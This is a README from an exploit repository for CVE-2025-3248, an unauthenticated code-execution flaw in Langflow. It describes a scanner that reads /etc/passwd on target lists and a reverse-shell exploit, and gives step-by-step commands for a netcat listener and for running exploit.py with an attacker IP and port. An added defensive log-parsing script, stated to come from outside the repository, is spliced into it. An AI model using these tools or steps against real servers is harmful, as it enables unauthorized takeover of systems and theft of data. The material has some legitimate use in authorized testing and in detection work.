## https://sploitus.com/exploit?id=7BFED669-FAC0-5596-915A-7E14C6C03D6C
# CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE)

This repository contains two Python scripts:
- `LangflowCheck.py`: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248.
- `exploit.py`: A working reverse shell exploit for vulnerable Langflow targets.

## Summary

**CVE-2025-3248** is a critical vulnerability in Langflow AI that allows **unauthenticated attackers** to execute arbitrary Python code remotely via a crafted payload to `/api/v1/validate/code`.
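For defenders, requests to the endpoint named above can be surfaced from reverse-proxy access logs. The following is an added example, not code from this repository; the Combined Log Format, the trusted network range, the helper name `find_suspect_requests` and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

ENDPOINT = "/api/v1/validate/code"  # endpoint named in the summary above

# Assumption: a reverse proxy in front of Langflow writes Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

TRUSTED = [ip_network("10.0.0.0/8")]  # assumption: internal range allowed to call the API

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2025:09:14:02 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Apr/2025:09:14:05 +0000] "POST /api/v1/validate/code/ HTTP/1.1" 200 498 "-" "python-requests/2.31.0"
10.1.2.3 - - [10/Apr/2025:09:15:00 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 120 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Apr/2025:09:16:41 +0000] "GET /api/v1/validate/code HTTP/1.1" 405 31 "-" "curl/8.5.0"
198.51.100.20 - - [10/Apr/2025:09:17:10 +0000] "POST /api/v1/validate/code?x=1 HTTP/1.1" 403 0 "-" "curl/8.5.0"
192.0.2.44 - - [10/Apr/2025:09:18:00 +0000] "POST /api/v1/flows HTTP/1.1" 201 88 "-" "Mozilla/5.0"
"""

def find_suspect_requests(log_text, trusted=TRUSTED):
    """Map source IP -> [(timestamp, status)] for POSTs to ENDPOINT from untrusted sources."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Normalise: drop the query string and any trailing slash before comparing.
        path = m["path"].split("?", 1)[0].rstrip("/")
        if path != ENDPOINT:
            continue
        try:
            src = ip_address(m["ip"])
        except ValueError:
            continue  # client field is not an IP address (e.g. a hostname)
        if any(src in net for net in trusted):
            continue
        hits[m["ip"]].append((m["ts"], int(m["status"])))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_suspect_requests(SAMPLE_LOG).items():
        served = sum(1 for _, status in events if status == 200)
        print(f"{ip}: {len(events)} POST(s) to {ENDPOINT}, {served} answered 200")
```

A 200 response here only shows that the request was answered rather than rejected upstream; confirming what was executed requires application or host logs.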

---

## Files

### `LangflowCheck.py`

- Checks if a target is vulnerable by attempting to execute a harmless payload that reads `/etc/passwd`.
- Can scan a single target or a list of URLs.
- Supports outputting vulnerable targets to a file.

### `exploit.py`

- Sends a reverse shell payload to the vulnerable endpoint.
- Requires attacker IP (`lhost`) and listener port (`lport`).
- Logs activity to `exploit.log`.
- Supports listener check before sending payload.

---

## Usage

### 1. Install Requirements
```bash
pip install -r requirements.txt
```
### 2. Run Vulnerability Scanner
Single URL
```bash
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
```
![1](https://github.com/user-attachments/assets/ef572e83-21ad-4661-86b0-9c575e092ba0)

Multiple Targets
```bash
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
```
![tt](https://github.com/user-attachments/assets/76133300-41fa-4b1f-8722-24186b8add20)


### 3. Exploit a Target

First, start a listener:
```bash
sudo nc -nvlp 4444
```
![l](https://github.com/user-attachments/assets/6e3e3275-d5a7-4aad-a148-3cb48fcd7103)

Then, run the exploit:
```bash
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
```
![2](https://github.com/user-attachments/assets/6d24cf8d-8a15-4844-9794-d9d91de80218)


You should receive a shell if the target is vulnerable.
![root](https://github.com/user-attachments/assets/291a630e-ab53-4ab3-92e3-c1ac973e377c)


## โš ๏ธ Disclaimer

This exploit is for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.